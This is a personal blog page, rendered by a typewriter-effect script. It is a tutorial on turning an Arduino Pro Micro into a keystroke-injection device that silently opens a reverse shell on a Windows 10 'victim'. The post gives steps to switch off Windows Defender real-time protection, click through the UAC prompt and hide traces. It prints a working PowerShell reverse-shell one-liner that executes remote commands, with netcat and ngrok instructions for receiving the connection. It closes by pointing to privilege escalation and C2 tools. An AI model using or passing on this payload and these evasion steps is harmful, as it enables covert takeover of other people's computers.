<!DOCTYPE html>
<html lang="en-us"><head>
    <title>revducky</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="description" content="" />
    <style>
@import "https://fonts.googleapis.com/css2?family=Inconsolata&display=swap";:root{--cursor-visibility:hidden}html,body{width:100%;height:100%;overflow:auto;font-family:inconsolata,monospace;font-size:4vmin;line-height:4.1vmin;font-weight:400}body{margin:0;display:flex;flex-direction:row;justify-content:center;align-items:center}#content{min-width:82vmin;min-height:82vmin}::-webkit-scrollbar{width:10px}::-webkit-scrollbar-track{border-radius:10px;box-shadow:inset 0 0 1px white}::-webkit-scrollbar-thumb{border-radius:10px;box-shadow:0 0 0 1px white}.cursor,#activity-title:after,#activity-content:after,#cd:after,#whoami:after,#cat:after,#tree:after{visibility:var(--cursor-visibility);content:"|";overflow:hidden;color:#fff;animation:blink 500ms linear infinite alternate}@keyframes blink{0%{opacity:0}100%{opacity:1}}@media only screen and (min-width:768px){body{font-size:2.5vmin;line-height:2.6vmin}#content{min-width:60vmin}}:root{--cursor-visibility:hidden}body{align-items:unset;overflow-y:scroll}#content{max-width:80vmin}pre{overflow-x:scroll;white-space:pre}@keyframes blink{0%{opacity:0}100%{opacity:1}}















    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    
        
    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    



body{background:#1B1D1E}body #terminal{color:#BBBBBB}body #user{color:#23E298}body #dir{color:#D08010}body .Typewriter__cursor{color:#BBBBBB}a{color:#BBBBBB}

</style>



</head><body><div id="content">
    
    
    


    <span id="activity-title"></span> <br>
 <span id="activity-content"></span> <br>

<script type="text/javascript">
    async function typewriter(text, elementId, waitAfter) {
        var n = 0,
            isTag = false
        addText = "";
        const el = document.getElementById(elementId);

        const wait = () => new Promise(r => setTimeout(r, waitAfter));
        const nowait = () => new Promise(r => r());

        const render = () => el.innerHTML = (text.slice(0, n + 1) + addText);

        const cursor = document.createElement('span');
        cursor.id = "blink";

        el.style.setProperty("--cursor-visibility", "visible");
        while (n < text.length) {
            if (text.charAt(n + 1) === "<") isTag = true;
            if (text.charAt(n + 1) === ">") isTag = false;

            if (isTag) {
                n++;
                continue;
            }

            requestAnimationFrame(render);

            if (waitAfter === 0) {
                await nowait();
            } else {
                await wait();
            }

            n++;
        }
        el.style.setProperty("--cursor-visibility", "collapse");
    }

    function parseDelay(d) {
        const parsed = parseInt(d, 10);
        if (isNaN(parsed)) return 0;
        return parsed;
    }

    const titleDelay = parseDelay("0"),
        contentDelay = parseDelay("0");
    const typeeffetct = async () => {
        await typewriter("\u003cspan id=\u0027terminal\u0027\u003e\u003ch1 id=\u0027title\u0027\u003erevducky\u003c\/h1\u003e\u003c\/span\u003e", "activity-title", titleDelay);
        await typewriter("\u003cspan id=\u0027terminal\u0027\u003e\u003cp\u003e\u003ca href=\u0022\/\u0022\u003eHome\u003c\/a\u003e\u003c\/p\u003e\n\u003ch1 style=\u0022line-height: 1.0;\u0022\u003eI made a rubber ducky reverse shell for \u003c$10 (Win-10)\u003c\/h1\u003e\n\u003cbr\/\u003e\n\u003ccenter\u003e\u003cimg src=\u0022\/hak5ducky.jpg\u0022 alt=\u0022hak5 rubber ducky\u0022 width=\u002257%\u0022 height=\u002257%\u0022\u003e\u003cbr\/\u003eUSB Rubber Ducky by Hak5\u003c\/center\u003e\n\u003cp\u003eThe Hak5 USB Rubber Ducky is a small microcontroller that acts as a keyboard and automatically enters pre-programmed keystrokes. The original Rubber Ducky by Hak5 will cost you 60$. I will be making one for under 10$ with an Arduino pro micro and writing a script to start and conceal a Windows 10 reverse shell. This blog post will be a guide for users with a Linux attacker machine and a Windows 10 Home victim machine. Please contact me on discord at SuperTsumu#9404 if there are any enquires.\u003c\/p\u003e\n\u003ch2 id=\u0022click-here-to-watch-it-in-actionhttpswwwyoutubecomwatchvxgkbkee1ufg\u0022\u003e\u003ca href=\u0022https:\/\/www.youtube.com\/watch?v=XgKbkeE1UFg\u0022\u003eClick here to watch it in action\u003c\/a\u003e\u003c\/h2\u003e\n\u003cbr\/\u003e\n## Software and Hardware Requirements\n\u003ccenter\u003e\u003cimg src=\u0022\/promicro.jpg\u0022 alt=\u0022hak5 rubber ducky\u0022 width=\u002257%\u0022 height=\u002257%\u0022\u003e\u003cbr\/\u003eMy Pro micro and USB connector\u003c\/center\u003e\n\u003cul\u003e\n\u003cli\u003e1 Arduino Pro Micro\u003c\/li\u003e\n\u003cli\u003e1 Male Micro USB to Male USB A\u003c\/li\u003e\n\u003cli\u003eA Web Browser\u003c\/li\u003e\n\u003cli\u003eA Victim Windows 10 Home Edition machine and an Attacker machine\u003c\/li\u003e\n\u003cli\u003eArduino IDE\u003c\/li\u003e\n\u003cli\u003eNetcat\u003c\/li\u003e\n\u003cli\u003eNgrok (Optional)\u003c\/li\u003e\n\u003c\/ul\u003e\n\u003cbr\/\u003e\n\u003ch2 id=\u0022the-concept\u0022\u003eThe Concept\u003c\/h2\u003e\n\u003cp\u003eRubber Ducky commands are written in Ducky Script, a very simple Basic-like scripting language. Ducky Script is used to specify what keystrokes are to be inputted by the Rubber Ducky. We will be scripting with Ducky Script and converting it into C with \u003ca href=\u0022https:\/\/dukweeno.github.io\/Duckuino\/\u0022\u003eDuckuino\u003c\/a\u003e which we will then compile and flash into our pro micro. I chose to use the pro micro because it has support for HID inputs and because I am familiar with programming and flashing Arduinos.\u003c\/p\u003e\n\u003cp\u003eFor a Windows reverse shell to work, we will have to disable Windows Defender. I don’t think there is a way to do it on the command line so I improvised and decided to program the navigation to the Windows Defender GUI and disable the antivirus manually with only keystrokes (More on that later). I also put in a lot of effort into concealing anything suspicious such as removing the Windows Defender applet with the red cross on the task bar and backgrounding the powershell reverse shell so that the process runs outside of the desktop.\u003c\/p\u003e\n\u003ch2 id=\u0022scripting\u0022\u003eScripting\u003c\/h2\u003e\n\u003cp\u003e#Disclaimer: My script is written and tested Windows 10 Home edition. Navigation towards certain areas may be different on your victim machine. If the script fails to navigate to the certain parts, please trace your steps and script accordingly.\u003c\/p\u003e\n\u003cp\u003e\u003ca href=\u0022https:\/\/app.gitbook.com\/o\/-MhLMNy_PPNtiWwEW3m9\/s\/-MjACIlYXNWPVgeWjK9f\/the-ducky-script-language\/ducky-script-quick-reference\u0022\u003eClick here for the Ducky Script documentation\u003c\/a\u003e. It is very simple and anyone can pick it up in less than 5 minutes. My Ducky Scripts can be found over \u003ca href=\u0022https:\/\/github.com\/supertsumu\/duckyscripts\u0022\u003ehere\u003c\/a\u003e on my Github.\u003c\/p\u003e\n\u003cp\u003eFirst, we have to disable Windows Defender for anything to work. The goal is to navigate to the Windows Defender Antivirus GUI with only keystrokes. What I like to navigate to that page manually only with keystrokes and tracing what I enter at the same time. We can use Win\u002bR to open the Windows Defender GUI and navigate pages using “tabs” and “enter”. Once I got to the “Virus \u0026amp; threat protection settings”, I tab to focus on the “Real-time protection” switch and turn it off using “space”. This will bring up the “User account control” prompt that asks for permissions before disabling the antivirus. We can bypass this by using “LEFTARROW” and hitting “enter” to accept the permissions. We then close the Windows Defender GUI using alt\u002bf4.\u003c\/p\u003e\n\u003ccenter\u003e\u003cimg src=\u0022\/windef.jpg\u0022 alt=\u0022hak5 rubber ducky\u0022 width=\u002280%\u0022 height=\u002280%\u0022\u003e\u003cbr\/\u003eVirus \u0026 threat protection \u003e Manage settings\u003c\/center\u003e\n\u003cp\u003e#NOTE: It is vital to use the “DELAY” function between keystrokes. Add more delay when launching GUI apps as they might take some time to load. It is safer to be liberal with the amount of delay because the commands may be out of sync if they execute before the application has loaded.\u003c\/p\u003e\n\u003cp\u003eWe use the same navigation method to disable the antivirus and remove the Windows Defender icon from the taskbar.\u003c\/p\u003e\n\u003cp\u003eUse this modified powershell reverse shell one-liner that runs the process in the background:\u003c\/p\u003e\n\u003cpre tabindex=\u00220\u0022\u003e\u003ccode\u003eStart-Job -ScriptBlock{$client = New-Object System.Net.Sockets.TCPClient(\u0026#34;[IP Address]\u0026#34;,[Port]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u0026gt;\u0026amp;1 | Out-String );$sendback2 = $sendback \u002b \u0026#34;PS \u0026#34; \u002b (pwd).Path \u002b \u0026#34;\u0026gt; \u0026#34;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}\n\u003c\/code\u003e\u003c\/pre\u003e\u003cp\u003eReplace [IP Address] and [Port] with the IP address and port number of your listening machine.\u003c\/p\u003e\n\u003cp\u003eAfter completing the Ducky Script, we copy and paste the script into \u003ca href=\u0022https:\/\/dukweeno.github.io\/Duckuino\/\u0022\u003eDuckuino\u003c\/a\u003e and copy and paste the C output into the Arduino IDE, save the sketch and flash the commands into the pro micro.\u003c\/p\u003e\n\u003ccenter\u003e\u003cimg src=\u0022\/arduinoide.jpg\u0022 alt=\u0022hak5 rubber ducky\u0022 width=\u0022100%\u0022 height=\u0022100%\u0022\u003e\u003cbr\/\u003ePaste the output from Duckuino into the IDE, save the file and flash the binary into your pro micro while it is plugged into your computer\u003c\/center\u003e\n\u003ch2 id=\u0022listening-for-reverse-shells-with-netcat-and-ngrok\u0022\u003eListening for reverse shells with netcat and Ngrok\u003c\/h2\u003e\n\u003cp\u003eIf our target machine is on the same network as the attacker machine, we can simply start a basic netcat listener to listen for connections:\u003c\/p\u003e\n\u003cdiv class=\u0022highlight\u0022\u003e\u003cpre tabindex=\u00220\u0022 style=\u0022color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\u0022\u003e\u003ccode class=\u0022language-bash\u0022 data-lang=\u0022bash\u0022\u003e\u003cspan style=\u0022display:flex;\u0022\u003e\u003cspan\u003enc -lnvp \u003cspan style=\u0022color:#f92672\u0022\u003e[\u003c\/span\u003eport\u003cspan style=\u0022color:#f92672\u0022\u003e]\u003c\/span\u003e -s \u003cspan style=\u0022color:#f92672\u0022\u003e[\u003c\/span\u003eip address\u003cspan style=\u0022color:#f92672\u0022\u003e]\u003c\/span\u003e\n\u003c\/span\u003e\u003c\/span\u003e\u003c\/code\u003e\u003c\/pre\u003e\u003c\/div\u003e\u003cp\u003eYou can locate your private IP address using “ifconfig” on linux:\u003c\/p\u003e\n\u003ccenter\u003e\u003cimg src=\u0022\/ifconfig.png\u0022 width=\u0022100%\u0022 height=\u0022100%\u0022\u003e\u003cbr\/\u003e\u003c\/center\u003e\n\u003cp\u003eSay we want to start a reverse shell on another machine that is on another network, we can not use our private IP address. We have to use our public IP address which is the IP address of our router. Instead of dealing with port forwarding, we can use Ngrok. Ngrok hosts a server with a public IP address and forwards any requests onto your machine. This means machines outside your network will be able to communicate with your machine through Ngrok as a middleman. Sign up for Ngrok \u003ca href=\u0022https:\/\/ngrok.com\/\u0022\u003ehere\u003c\/a\u003e and follow the steps to integrate ngrok onto your attacker machine.\u003c\/p\u003e\n\u003cp\u003eWe can start a public Ngrok tcp server using:\u003c\/p\u003e\n\u003cdiv class=\u0022highlight\u0022\u003e\u003cpre tabindex=\u00220\u0022 style=\u0022color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\u0022\u003e\u003ccode class=\u0022language-bash\u0022 data-lang=\u0022bash\u0022\u003e\u003cspan style=\u0022display:flex;\u0022\u003e\u003cspan\u003engrok tcp \u003cspan style=\u0022color:#f92672\u0022\u003e[\u003c\/span\u003eport you want Ngrok to forward to\u003cspan style=\u0022color:#f92672\u0022\u003e]\u003c\/span\u003e\n\u003c\/span\u003e\u003c\/span\u003e\u003c\/code\u003e\u003c\/pre\u003e\u003c\/div\u003e\u003cp\u003eThis will start a process on your terminal:\u003c\/p\u003e\n\u003ccenter\u003e\u003cimg src=\u0022\/ngrok.png\u0022 width=\u0022100%\u0022 height=\u0022100%\u0022\u003e\u003cbr\/\u003e\u003c\/center\u003e\n\u003cp\u003eSince we are using Ngrok as a middle man between our victim machine and our attacker machine, we have to use Ngrok’s public IP\/DNS in our payload. Replace the [IP Address] and [Port] part of the powershell one-liner from the payload with Ngrok’s DNS. In my case, the IP address will be 2.tcp.ngrok.io and the port will be 14485. Disregard the tcp:\/\/ protocol handler for the payload to work. Then start the same netcat listener mentioned before.\u003c\/p\u003e\n\u003cp\u003eWe are done! Now all theres left is to test it by simply plugging it into your Windows 10 machine. You may find that your script may sometimes be out of sync during certain parts of the script. Be sure to add more delay during those parts\u003c\/p\u003e\n\u003ch2 id=\u0022whats-next\u0022\u003eWhats next?\u003c\/h2\u003e\n\u003cp\u003eFirst thing you might want to look into is shell hardening. The netcat reverse shell lacks a lot of features. For example, the shell will not be able to accept arrow inputs, ctrl\u002bc kills the shell and most importantly, we can’t run CLI tools that use the command line as an interactive interface.\u003c\/p\u003e\n\u003cp\u003eAfter getting a more feature-rich shell, you can try to escalate your privileges or have fun with some post exploitation, its up to you really!\u003c\/p\u003e\n\u003cp\u003eYou might also want to consider a more feature-rich C2 framework such as Metasploit\u0026rsquo;s meterpreter or Sliver.\u003c\/p\u003e\n\u003cp\u003eThis is the end of my first blog. Thanks for reading.\u003c\/p\u003e\n\u003c\/span\u003e", "activity-content", contentDelay);
        return;
    }

    typeeffetct()
</script>

        </div></body>
</html>
